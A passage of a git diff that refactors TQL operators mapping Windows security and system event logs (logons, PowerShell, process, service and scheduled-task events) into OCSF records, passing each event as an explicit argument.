ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 1 // Success +$event.ocsf.status_id = 1 // Success // Windows LogonType integers map directly to OCSF logon_type_id values // (Interactive=2, Network=3, Batch=4, Service=5, Unlock=7, NetworkCleartext=8, // NewCredentials=9, RemoteInteractive=10, CachedInteractive=11, …). -ocsf.logon_type_id = move windows.EventData.LogonType +$event.ocsf.logon_type_id = move $event.windows.EventData.LogonType -ocsf.user = { - uid: move windows.EventData.TargetUserSid, - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.user = { + uid: move $event.windows.EventData.TargetUserSid, + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, - hostname: move windows.EventData.WorkstationName, +$event.ocsf.src_endpoint = { + ip: move $event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, + hostname: move $event.windows.EventData.WorkstationName, } -ocsf.auth_protocol = move windows.EventData.AuthenticationPackageName +$event.ocsf.auth_protocol = move $event.windows.EventData.AuthenticationPackageName -ocsf.session = { - uid: move windows.EventData.LogonGuid, - uid_alt: move windows.EventData.TargetLogonId, +$event.ocsf.session = { + uid: move $event.windows.EventData.LogonGuid, + uid_alt: move $event.windows.EventData.TargetLogonId, } diff --git a/microsoft/operators/windows/ocsf/events/logon_failed.tql b/microsoft/operators/windows/ocsf/events/logon_failed.tql index 3e08e63..0521483 100644 --- a/microsoft/operators/windows/ocsf/events/logon_failed.tql +++ b/microsoft/operators/windows/ocsf/events/logon_failed.tql @@ -1,42 +1,47 @@ --- description: Failed Logon (EID 4625) → OCSF Authentication (3002, Logon/Failure) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure -ocsf.severity_id = 2 // Low — single failed logon; brute-force detection is a higher layer -ocsf.status_code = move windows.EventData.Status // hex NTSTATUS (e.g. 0xC000006D = wrong credentials) +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 2 // Low — single failed logon; brute-force detection is a higher layer +$event.ocsf.status_code = move $event.windows.EventData.Status // hex NTSTATUS (e.g. 0xC000006D = wrong credentials) // Windows LogonType integers map directly to OCSF logon_type_id values. -ocsf.logon_type_id = move windows.EventData.LogonType +$event.ocsf.logon_type_id = move $event.windows.EventData.LogonType -ocsf.user = { - uid: move windows.EventData.TargetUserSid, - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.user = { + uid: move $event.windows.EventData.TargetUserSid, + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, - hostname: move windows.EventData.WorkstationName, +$event.ocsf.src_endpoint = { + ip: move $event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, + hostname: move $event.windows.EventData.WorkstationName, } -ocsf.auth_protocol = move windows.EventData.AuthenticationPackageName +$event.ocsf.auth_protocol = move $event.windows.EventData.AuthenticationPackageName diff --git a/microsoft/operators/windows/ocsf/events/ntlm_auth.tql b/microsoft/operators/windows/ocsf/events/ntlm_auth.tql index ef7727a..268137a 100644 --- a/microsoft/operators/windows/ocsf/events/ntlm_auth.tql +++ b/microsoft/operators/windows/ocsf/events/ntlm_auth.tql @@ -1,20 +1,25 @@ --- description: NTLM Authentication (EID 4776) → OCSF Authentication (3002, Logon) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Status 0x0 = success; non-zero = failure (e.g. 0xC000006A = wrong password). -ocsf.status_id = 1 if windows.EventData.Status == "0x0" else 2 -ocsf.status_code = move windows.EventData.Status +$event.ocsf.status_id = 1 if $event.windows.EventData.Status == "0x0" else 2 +$event.ocsf.status_code = move $event.windows.EventData.Status -ocsf.user = { - name: move windows.EventData.TargetUserName, +$event.ocsf.user = { + name: move $event.windows.EventData.TargetUserName, } // PackageName identifies the NTLM variant; map to auth_protocol_id so that @@ -23,9 +28,9 @@ let $protocols = { "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0": 1, // NTLM v1 "NTLM": 1, } -ocsf.auth_protocol_id = $protocols[windows.EventData.PackageName]? else 99 -drop windows.EventData.PackageName +$event.ocsf.auth_protocol_id = $protocols[$event.windows.EventData.PackageName]? else 99 +drop $event.windows.EventData.PackageName -ocsf.src_endpoint = { - hostname: move windows.EventData.Workstation, +$event.ocsf.src_endpoint = { + hostname: move $event.windows.EventData.Workstation, } diff --git a/microsoft/operators/windows/ocsf/events/powershell_error.tql b/microsoft/operators/windows/ocsf/events/powershell_error.tql index 570ce84..f61097b 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_error.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_error.tql @@ -1,41 +1,46 @@ --- description: PowerShell Engine Error (EID 4100) → OCSF Script Activity (1009, Execute/Failure) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.script_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1009 -ocsf.activity_id = 1 // Execute -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1009 +$event.ocsf.activity_id = 1 // Execute +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure — this event fires on PS engine errors -ocsf.severity_id = 2 // Low — Windows Level 3 (Warning) -ocsf.status_code = (move windows.EventData.ErrorCode).string() -ocsf.status_detail = move windows.EventData.Message +$event.ocsf.status_id = 2 // Failure — this event fires on PS engine errors +$event.ocsf.severity_id = 2 // Low — Windows Level 3 (Warning) +$event.ocsf.status_code = (move $event.windows.EventData.ErrorCode).string() +$event.ocsf.status_detail = move $event.windows.EventData.Message // HostApplication is the full command line (exe + args), not just the path. -ocsf.actor = { +$event.ocsf.actor = { process: { - cmd_line: move windows.EventData.HostApplication, + cmd_line: move $event.windows.EventData.HostApplication, file: { type_id: 8 }, }, } // User is in "DOMAIN\username" format. -_user = (move windows.EventData.User).split("\\") -ocsf.actor.user = { +_user = (move $event.windows.EventData.User).split("\\") +$event.ocsf.actor.user = { domain: _user[0], name: _user[1], } drop _user -ocsf.script = { +$event.ocsf.script = { type_id: 2, // PowerShell - name: move windows.EventData.CommandInvocation, + name: move $event.windows.EventData.CommandInvocation, } // CommandLine (the full command attempted), HostVersion, EngineVersion, // RunspaceId, PipelineId, ScriptName, ShellId — left in unmapped. -drop windows.EventData.HostName -drop windows.EventData.ConnectedUser +drop $event.windows.EventData.HostName +drop $event.windows.EventData.ConnectedUser diff --git a/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql b/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql index 0e773a1..4625346 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql @@ -1,18 +1,23 @@ --- description: PowerShell Module / Pipeline Logging (EID 4103) → OCSF Script Activity (1009, Execute) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.script_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1009 -ocsf.activity_id = 1 // Execute -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1009 +$event.ocsf.activity_id = 1 // Execute +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Windows Level 4 (Information). -ocsf.severity_id = 1 // Informational +$event.ocsf.severity_id = 1 // Informational -ocsf.script = { +$event.ocsf.script = { type_id: 2, // PowerShell } diff --git a/microsoft/operators/windows/ocsf/events/powershell_script_block.tql b/microsoft/operators/windows/ocsf/events/powershell_script_block.tql index d7db994..6f81def 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_script_block.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_script_block.tql @@ -1,32 +1,37 @@ --- description: PowerShell Script Block Logging (EID 4104) → OCSF Script Activity (1009, Execute) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.script_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1009 -ocsf.activity_id = 1 // Execute -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1009 +$event.ocsf.activity_id = 1 // Execute +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Windows Level 3 (Warning) when AMSI flags the block; Level 5 (Verbose) for // benign blocks. Map Level 3 → Low (2), everything else → Informational (1). -ocsf.severity_id = 2 if ocsf.metadata.log_level == "3" else 1 +$event.ocsf.severity_id = 2 if $event.ocsf.metadata.log_level == "3" else 1 -ocsf.script = { - uid: move windows.EventData.ScriptBlockId, +$event.ocsf.script = { + uid: move $event.windows.EventData.ScriptBlockId, type_id: 2, // PowerShell } // Path is the script file path when the block originates from a file; // empty string means an interactive/in-memory block. -if windows.EventData.Path? != null and windows.EventData.Path? != "" { - ocsf.script.file = { - path: move windows.EventData.Path, +if $event.windows.EventData.Path? != null and $event.windows.EventData.Path? != "" { + $event.ocsf.script.file = { + path: move $event.windows.EventData.Path, type_id: 1, // Regular file } - ocsf.script.file.name = ocsf.script.file.path.split("\\")[-1] - ocsf.script.name = ocsf.script.file.name + $event.ocsf.script.file.name = $event.ocsf.script.file.path.split("\\")[-1] + $event.ocsf.script.name = $event.ocsf.script.file.name } // ScriptBlockText is the raw script content and can be large. diff --git a/microsoft/operators/windows/ocsf/events/powershell_script_block_invocation.tql b/microsoft/operators/windows/ocsf/events/powershell_script_block_invocation.tql index 9893d00..da14810 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_script_block_invocation.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_script_block_invocation.tql @@ -2,27 +2,32 @@ description: > PowerShell Script Block Invocation Start/Stop (EID 4105/4106) → OCSF Script Activity (1009, Execute) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.script_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1009 -ocsf.activity_id = 1 // Execute -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1009 +$event.ocsf.activity_id = 1 // Execute +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Windows Level 5 (Verbose). -ocsf.severity_id = 1 // Informational +$event.ocsf.severity_id = 1 // Informational // These events carry only correlation IDs; their value is linking back to the // matching 4104 script-block record via script.uid / actor.session.uid. -ocsf.script = { - uid: move windows.EventData.ScriptBlockId, +$event.ocsf.script = { + uid: move $event.windows.EventData.ScriptBlockId, type_id: 2, // PowerShell } -ocsf.actor = { +$event.ocsf.actor = { session: { - uid: move windows.EventData.RunspaceId, + uid: move $event.windows.EventData.RunspaceId, }, } diff --git a/microsoft/operators/windows/ocsf/events/process_create.tql b/microsoft/operators/windows/ocsf/events/process_create.tql index fd55b19..4747782 100644 --- a/microsoft/operators/windows/ocsf/events/process_create.tql +++ b/microsoft/operators/windows/ocsf/events/process_create.tql @@ -1,47 +1,52 @@ --- description: Process Creation (EID 4688) → OCSF Process Activity (1007, Launch) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.process_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1007 -ocsf.activity_id = 1 // Launch -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1007 +$event.ocsf.activity_id = 1 // Launch +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.launch_type_id = 1 // Spawn +$event.ocsf.launch_type_id = 1 // Spawn -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.process = { - pid: int(move windows.EventData.NewProcessId, base=16), - path: move windows.EventData.NewProcessName, - cmd_line: move windows.EventData.CommandLine, +$event.ocsf.process = { + pid: int(move $event.windows.EventData.NewProcessId, base=16), + path: move $event.windows.EventData.NewProcessName, + cmd_line: move $event.windows.EventData.CommandLine, file: { type_id: 8 }, parent_process: { - pid: int(move windows.EventData.ProcessId, base=16), - path: move windows.EventData.ParentProcessName, + pid: int(move $event.windows.EventData.ProcessId, base=16), + path: move $event.windows.EventData.ParentProcessName, file: { type_id: 8 }, }, } -ocsf.process.name = ocsf.process.path.split("\\")[-1] -ocsf.process.file.name = ocsf.process.name -ocsf.process.file.path = ocsf.process.path -ocsf.process.parent_process.name = ocsf.process.parent_process.path.split("\\")[-1] -ocsf.process.parent_process.file.name = ocsf.process.parent_process.name -ocsf.process.parent_process.file.path = ocsf.process.parent_process.path +$event.ocsf.process.name = $event.ocsf.process.path.split("\\")[-1] +$event.ocsf.process.file.name = $event.ocsf.process.name +$event.ocsf.process.file.path = $event.ocsf.process.path +$event.ocsf.process.parent_process.name = $event.ocsf.process.parent_process.path.split("\\")[-1] +$event.ocsf.process.parent_process.file.name = $event.ocsf.process.parent_process.name +$event.ocsf.process.parent_process.file.path = $event.ocsf.process.parent_process.path // EID 4688 only fires on success. -ocsf.status_id = 1 +$event.ocsf.status_id = 1 // TargetUserSid/Name/Domain are the impersonation target (usually null after // sentinel replacement). TokenElevationType and MandatoryLabel have no OCSF home. diff --git a/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql b/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql index 9c6c4f0..c584bcd 100644 --- a/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql +++ b/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql @@ -1,31 +1,36 @@ --- description: Scheduled Task Created (EID 4698) → OCSF Scheduled Job Activity (1006, Create) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.scheduled_job_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1006 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1006 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // The process that made the Task Scheduler RPC call. -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, process: { - pid: int(move windows.EventData.ClientProcessId, base=16), + pid: int(move $event.windows.EventData.ClientProcessId, base=16), }, } -ocsf.job = { - name: move windows.EventData.TaskName, +$event.ocsf.job = { + name: move $event.windows.EventData.TaskName, } // TaskContent is an XML string describing triggers and actions. It is diff --git a/microsoft/operators/windows/ocsf/events/service_crashed.tql b/microsoft/operators/windows/ocsf/events/service_crashed.tql index 9b39186..f9d817a 100644 --- a/microsoft/operators/windows/ocsf/events/service_crashed.tql +++ b/microsoft/operators/windows/ocsf/events/service_crashed.tql @@ -1,19 +1,24 @@ --- description: Service Crashed Unexpectedly (EID 7034) → OCSF Windows Service Activity (201004, Stop/Failure) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 4 // Stop -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 4 // Stop +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure -ocsf.severity_id = 3 // Medium — unexpected crash warrants elevated severity +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 3 // Medium — unexpected crash warrants elevated severity -ocsf.win_service = { - name: move windows.EventData.param1, +$event.ocsf.win_service = { + name: move $event.windows.EventData.param1, } // param2 = number of times the service has terminated unexpectedly; left in diff --git a/microsoft/operators/windows/ocsf/events/service_install.tql b/microsoft/operators/windows/ocsf/events/service_install.tql index a4d9f4b..c52296a 100644 --- a/microsoft/operators/windows/ocsf/events/service_install.tql +++ b/microsoft/operators/windows/ocsf/events/service_install.tql @@ -1,35 +1,40 @@ --- description: Service Installed via Security Audit (EID 4697) → OCSF Windows Service Activity (201004, Create) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.win_service = { - name: move windows.EventData.ServiceName, +$event.ocsf.win_service = { + name: move $event.windows.EventData.ServiceName, service_file: { - path: move windows.EventData.ServiceFileName, + path: move $event.windows.EventData.ServiceFileName, type_id: 8, }, } // Strip quotes and arguments: "C:\path\svc.exe" --args → svc.exe -ocsf.win_service.service_file.name = ocsf.win_service.service_file.path.split("\\")[-1].split(" ")[0].replace("\"", "") -ocsf.win_service.service_start_name = move windows.EventData.ServiceAccount +$event.ocsf.win_service.service_file.name = $event.ocsf.win_service.service_file.path.split("\\")[-1].split(" ")[0].replace("\"", "") +$event.ocsf.win_service.service_start_name = move $event.windows.EventData.ServiceAccount // ServiceType (hex, e.g. "0x10") and ServiceStartType (integer, e.g. "2") are // left in unmapped — OCSF win_service enums exist but differ in encoding from diff --git a/microsoft/operators/windows/ocsf/events/service_install_scm.tql b/microsoft/operators/windows/ocsf/events/service_install_scm.tql index d1f1207..d5442bf 100644 --- a/microsoft/operators/windows/ocsf/events/service_install_scm.tql +++ b/microsoft/operators/windows/ocsf/events/service_install_scm.tql @@ -1,25 +1,30 @@ --- description: New Service Installed via SCM (EID 7045) → OCSF Windows Service Activity (201004, Create) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.win_service = { - name: move windows.EventData.ServiceName, +$event.ocsf.win_service = { + name: move $event.windows.EventData.ServiceName, service_file: { - path: move windows.EventData.ImagePath, + path: move $event.windows.EventData.ImagePath, type_id: 8, }, // service_start_name is the Windows account the service runs as (e.g. LocalSystem). - service_start_name: move windows.EventData.AccountName, + service_start_name: move $event.windows.EventData.AccountName, } // Strip quotes and arguments: "C:\path\svc.exe" --args → svc.exe -ocsf.win_service.service_file.name = ocsf.win_service.service_file.path.split("\\")[-1].split(" ")[0].replace("\"", "") +$event.ocsf.win_service.service_file.name = $event.ocsf.win_service.service_file.path.split("\\")[-1].split(" ")[0].replace("\"", "") // ServiceType and StartType are descriptive strings on this event (e.g. // "Own Process", "Auto Start"); numeric enums are on EID 4697. Leave them in diff --git a/microsoft/operators/windows/ocsf/events/task_lifecycle.tql b/microsoft/operators/windows/ocsf/events/task_lifecycle.tql index 34b5e21..49b9cba 100644 --- a/microsoft/operators/windows/ocsf/events/task_lifecycle.tql +++ b/microsoft/operators/windows/ocsf/events/task_lifecycle.tql @@ -2,28 +2,33 @@ description: > Task Scheduler Lifecycle (EID 106 Register, 140 Update, 141 Delete) → OCSF Scheduled Job Activity (1006) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.scheduled_job_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1006 +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1006 let $activities = { "106": 1, // Create "140": 2, // Update "141": 3, // Delete } -ocsf.activity_id = $activities[ocsf.metadata.event_code]? else 99 -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.activity_id = $activities[$event.ocsf.metadata.event_code]? else 99 +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.job = { - name: move windows.EventData.TaskName, +$event.ocsf.job = { + name: move $event.windows.EventData.TaskName, } // UserContext is "DOMAIN\username" format. -_user = (move windows.EventData.UserContext).split("\\") -ocsf.actor = { +_user = (move $event.windows.EventData.UserContext).split("\\") +$event.ocsf.actor = { user: { domain: _user[0], name: _user[1], diff --git a/microsoft/operators/windows/ocsf/events/task_run.tql b/microsoft/operators/windows/ocsf/events/task_run.tql index 8d4dcf7..0b0c1cc 100644 --- a/microsoft/operators/windows/ocsf/events/task_run.tql +++ b/microsoft/operators/windows/ocsf/events/task_run.tql @@ -3,12 +3,17 @@ description: > Task Scheduler Execution (EID 100 Start, 101 Failure, 102 Complete, 129 Process Launch, 200 Action Start, 201 Action Complete) → OCSF Scheduled Job Activity (1006) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.scheduled_job_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1006 +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1006 let $activities = { "100": 6, // Start @@ -18,39 +23,39 @@ let $activities = { "200": 6, // Start (action started) "201": 99, // Other — OCSF 1006 has no Stop activity } -ocsf.activity_id = $activities[ocsf.metadata.event_code]? else 99 -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.activity_id = $activities[$event.ocsf.metadata.event_code]? else 99 +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // EID 101 fires on launch failure (Windows Level 2 = Error). -if ocsf.metadata.event_code == "101" { - ocsf.status_id = 2 // Failure - ocsf.severity_id = 3 // Medium +if $event.ocsf.metadata.event_code == "101" { + $event.ocsf.status_id = 2 // Failure + $event.ocsf.severity_id = 3 // Medium } // EIDs 102 and 201 carry a ResultCode; non-zero means failure. -if windows.EventData.has("ResultCode") { - ocsf.status_id = 1 if windows.EventData.ResultCode == 0 else 2 - ocsf.status_code = (move windows.EventData.ResultCode).string() +if $event.windows.EventData.has("ResultCode") { + $event.ocsf.status_id = 1 if $event.windows.EventData.ResultCode == 0 else 2 + $event.ocsf.status_code = (move $event.windows.EventData.ResultCode).string() } -ocsf.job = { - name: move windows.EventData.TaskName, +$event.ocsf.job = { + name: move $event.windows.EventData.TaskName, } // InstanceId/TaskInstanceId has no OCSF job field; leave in unmapped. // ActionName is the executable path for EIDs 200/201. -if windows.EventData.has("ActionName") { - ocsf.job.file = { - path: move windows.EventData.ActionName, +if $event.windows.EventData.has("ActionName") { + $event.ocsf.job.file = { + path: move $event.windows.EventData.ActionName, type_id: 1, // Regular file } - ocsf.job.file.name = ocsf.job.file.path.split("\\")[-1] + $event.ocsf.job.file.name = $event.ocsf.job.file.path.split("\\")[-1] } // UserContext present on EID 100. -if windows.EventData.has("UserContext") { - _user = (move windows.EventData.UserContext).split("\\") - ocsf.actor = { +if $event.windows.EventData.has("UserContext") { + _user = (move $event.windows.EventData.UserContext).split("\\") + $event.ocsf.actor = { user: { domain: _user[0], name: _user[1], @@ -60,8 +65,8 @@ if windows.EventData.has("UserContext") { } // ProcessId (EID 129) or EnginePID (EIDs 200/201). -if windows.EventData.has("ProcessId") { - ocsf.actor.process = { pid: int(move windows.EventData.ProcessId) } -} else if windows.EventData.has("EnginePID") { - ocsf.actor.process = { pid: int(move windows.EventData.EnginePID) } +if $event.windows.EventData.has("ProcessId") { + $event.ocsf.actor.process = { pid: int(move $event.windows.EventData.ProcessId) } +} else if $event.windows.EventData.has("EnginePID") { + $event.ocsf.actor.process = { pid: int(move $event.windows.EventData.EnginePID) } } diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index 0014aeb..7261389 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql @@ -7,143 +7,141 @@ args: type: field --- -windows = $event -ocsf = {} +$event = {...$event, windows: $event, ocsf: {}} -ocsf.metadata = { - event_code: windows.System.EventID.string(), +$event.ocsf.metadata = { + event_code: $event.windows.System.EventID.string(), extensions: [{name: "win"}], log_format: "xml", - log_name: move windows.System.Channel, - log_level: (move windows.System.Level).string(), - log_version: (move windows.System.Version).string(), - logged_time: move windows.System.TimeCreated.SystemTime, - original_event_uid: (move windows.System.EventRecordID).string(), + log_name: move $event.windows.System.Channel, + log_level: (move $event.windows.System.Level).string(), + log_version: (move $event.windows.System.Version).string(), + logged_time: move $event.windows.System.TimeCreated.SystemTime, + original_event_uid: (move $event.windows.System.EventRecordID).string(), processed_time: now(), product: { - name: move windows.System.Provider.Name, - uid: move windows.System.Provider.Guid?, + name: move $event.windows.System.Provider.Name, + uid: move $event.windows.System.Provider.Guid?, vendor_name: "Microsoft", }, profiles: ["host"], version: "1.8.0", } -windows.System.EventID = windows.System.EventID.int() -drop windows.System.Provider -drop windows.System.TimeCreated +$event.windows.System.EventID = $event.windows.System.EventID.int() +drop $event.windows.System.Provider +drop $event.windows.System.TimeCreated -ocsf.severity_id = 1 +$event.ocsf.severity_id = 1 // Native Windows events have only one timestamp (SystemTime); copy it to time. -ocsf.time = ocsf.metadata.logged_time +$event.ocsf.time = $event.ocsf.metadata.logged_time -ocsf.device = { - hostname: move windows.System.Computer, +$event.ocsf.device = { + hostname: move $event.windows.System.Computer, } // "-" is the universal Windows sentinel for "not applicable/empty". replace what="-", with=null -match windows.System.EventID { +match $event.windows.System.EventID { 99..103 | 129 | 199..202 => { - microsoft::windows::ocsf::events::task_run + microsoft::windows::ocsf::events::task_run event=$event } 106 | 139..142 => { - microsoft::windows::ocsf::events::task_lifecycle + microsoft::windows::ocsf::events::task_lifecycle event=$event } 1000 => { - microsoft::windows::ocsf::events::application_error + microsoft::windows::ocsf::events::application_error event=$event } 1001 => { - microsoft::windows::ocsf::events::application_crash_report + microsoft::windows::ocsf::events::application_crash_report event=$event } 1002 => { - microsoft::windows::ocsf::events::application_hang + microsoft::windows::ocsf::events::application_hang event=$event } 1005..1008 => { - microsoft::windows::ocsf::events::defender_threat + microsoft::windows::ocsf::events::defender_threat event=$event } 1102 => { - microsoft::windows::ocsf::events::eventlog_clear + microsoft::windows::ocsf::events::eventlog_clear event=$event } 1115..1118 => { - microsoft::windows::ocsf::events::defender_detection + microsoft::windows::ocsf::events::defender_detection event=$event } 1121 => { - microsoft::windows::ocsf::events::defender_asr + microsoft::windows::ocsf::events::defender_asr event=$event } 2000 => { - microsoft::windows::ocsf::events::defender_signature_update + microsoft::windows::ocsf::events::defender_signature_update event=$event } 4100 => { - microsoft::windows::ocsf::events::powershell_error + microsoft::windows::ocsf::events::powershell_error event=$event } 4103 => { - microsoft::windows::ocsf::events::powershell_module_logging + microsoft::windows::ocsf::events::powershell_module_logging event=$event } 4104 => { - 